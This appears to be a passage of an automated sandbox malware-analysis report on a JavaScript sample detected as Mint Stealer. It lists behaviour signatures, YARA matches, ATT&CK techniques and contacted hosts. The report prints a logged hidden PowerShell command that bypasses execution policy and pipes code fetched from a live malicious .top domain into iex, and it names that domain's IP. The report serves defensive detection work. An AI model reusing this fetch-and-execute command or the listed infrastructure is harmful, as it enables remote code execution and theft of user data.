              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4260Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5587Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -15679732462653109s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: powershell.exe, 00000002.00000002.1570309617.0000027957BF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.1570309617.0000027957BF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Mint Stealer
              Source: Yara matchFile source: amsi64_7456.amsi.csv, type: OTHER
              Source: Yara matchFile source: 00000000.00000003.1499672307.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1500335199.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1500163574.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1499012379.0000023BD7E29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1497822366.0000023BD9C3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1500383727.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1506269104.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7456, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Mint Stealer
              Source: Yara matchFile source: amsi64_7456.amsi.csv, type: OTHER
              Source: Yara matchFile source: 00000000.00000003.1499672307.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1500335199.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1500163574.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1499012379.0000023BD7E29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1497822366.0000023BD9C3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1500383727.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1506269104.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7456, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information42
              Scripting              		Valid Accounts1
              Exploitation for Client Execution              		42
              Scripting              		11
              Process Injection              		21
              Virtualization/Sandbox Evasion              		OS Credential Dumping1
              Security Software Discovery              		Remote ServicesData from Local System1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts3
              PowerShell              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive112
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              File Deletion              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              FM5vWQHpqe.js20%VirustotalBrowse
              FM5vWQHpqe.js8%ReversingLabsText.Malware.Boxter

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nzy3tvbb72g3.top/1.php?s=mints13100%Avira URL Cloudmalware
              http://nzy3tvbb72g3.top100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              nzy3tvbb72g3.top
              		206.188.196.219
              		truefalse
                		high
                www.google.com
                		142.250.185.68
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://nzy3tvbb72g3.top/1.php?s=mints13true
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.google.com/false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://play.google.com/?hl=en&tab=w8powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1550248650.0000027941258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000002.00000002.1550248650.000002793FC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794FB9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1550248650.00000279410E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1550248650.00000279410E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.google.com/preferences?hl=enXpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000002.00000002.1550248650.0000027940E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://drive.google.com/?tab=wopowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://news.google.com/?tab=wnpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://mail.google.com/mail/?tab=wmpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.google.com/preferences?hl=enpowershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1550248650.00000279410E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schema.org/WebPagepowershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002794079C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.00000279407B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.00000279407AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.youtube.com/?tab=w1powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/webhp?tab=wwpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.google.com/history/optout?hl=enpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://books.google.com/?hl=en&tab=wppowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.com/logos/doodles/2025/dr-martin-luther-king-jr-day-2025-6753651837110587.2-2x.pnpowershell.exe, 00000002.00000002.1550248650.0000027940B5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schema.org/WebPageXpowershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1550248650.0000027941258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.com/finance?tab=wepowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://oneget.orgXpowershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.google.compowershell.exe, 00000002.00000002.1550248650.0000027940E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.1550248650.000002793F8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://apis.google.compowershell.exe, 00000002.00000002.1550248650.000002793FC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794FB9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1550248650.000002793F8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.blogger.com/?tab=wjpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://nzy3tvbb72g3.toppowershell.exe, 00000002.00000002.1550248650.000002793FAC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940BD7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://oneget.orgpowershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            142.250.185.68
                                                                                                            		www.google.comUnited States
                                                                                                            		15169GOOGLEUSfalse
                                                                                                            206.188.196.219
                                                                                                            		nzy3tvbb72g3.topUnited States
                                                                                                            		55002DEFENSE-NETUSfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                            Analysis ID:1595057
                                                                                                            Start date and time:2025-01-20 11:54:43 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 3m 25s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:7
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • GSI enabled (Javascript)
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:FM5vWQHpqe.js
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:24c03cb37e48b5810f40fdd69acb290d67dbfd003bef5c21cf23b1d210a0faa1.js
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.expl.evad.winJS@4/5@2/2
                                                                                                            EGA Information:Failed
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            • Number of executed functions: 2
                                                                                                            • Number of non-executed functions: 5
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .js
                                                                                                            • Stop behavior analysis, all processes terminated

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212
                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7580 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            05:55:48API Interceptor27x Sleep call for process: powershell.exe modified

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            206.188.196.219xIIjYxLdOP.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • nzy3tvbb72g3.top/1.php?s=mints13
                                                                                                            gnwVi8pjnN.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • nzy3tvbb72g3.top/1.php?s=mints13
                                                                                                            naBQQL40Av.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • nzy3tvbb72g3.top/1.php?s=mints13
                                                                                                            9McbmtkQB6.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • nzy3tvbb72g3.top/1.php?s=mints13
                                                                                                            gPTn2cWymy.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • nzy3tvbb72g3.top/1.php?s=mints13
                                                                                                            Fattura82924748.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • nzy3tvbb72g3.top/1.php?s=mints13

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            nzy3tvbb72g3.topxIIjYxLdOP.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            gnwVi8pjnN.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            naBQQL40Av.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            9McbmtkQB6.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            gPTn2cWymy.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            Fattura82924748.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            DEFENSE-NETUSxIIjYxLdOP.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            gnwVi8pjnN.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            naBQQL40Av.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            9McbmtkQB6.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            gPTn2cWymy.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            Fattura82924748.jsGet hashmaliciousMint StealerBrowse
                                                                                                            • 206.188.196.219
                                                                                                            https://neat-lydian-copper.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 205.178.189.131
                                                                                                            https://1143b54.wcomhost.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 206.188.192.6
